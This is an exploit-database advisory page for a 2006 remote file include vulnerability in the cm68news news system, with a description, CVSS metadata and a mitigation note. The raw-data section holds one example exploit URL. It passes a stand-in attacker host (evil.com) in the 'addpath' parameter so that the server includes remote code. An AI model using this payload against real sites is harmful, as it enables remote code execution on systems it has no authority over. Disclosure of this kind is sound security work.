header-logo
Suggest Exploit
vendor:
cm68news
by:
Paul Bakoyiannis
7.5
CVSS
HIGH
Remote File Include
98
CWE
Product Name: cm68news
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

cm68news Remote File Include Vulnerability

A remote file include vulnerability exists in cm68news, a web-based news management system. The vulnerability is due to the 'addpath' variable in the '/engine/oldnews.inc.php' script not being properly sanitized before being used in a include() call. This can be exploited to include arbitrary files from remote hosts by passing a URL in the 'addpath' parameter. Successful exploitation requires that 'allow_url_fopen' is enabled on the target host.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized before being used in a include() call.
Source

Exploit-DB raw data:

Vulnerable Software:cm68news
Vulnerable file: /engine/oldnews.inc.php
Credits: Paul Bakoyiannis
Vulnerable Variable: addpath
Example Exploit: http://site.com/cm68news/engine/oldnews.inc.php?addpath=http://evil.com/script.txt?&

# milw0rm.com [2006-12-08]

Navigation

Suggest Exploit

Services By CQR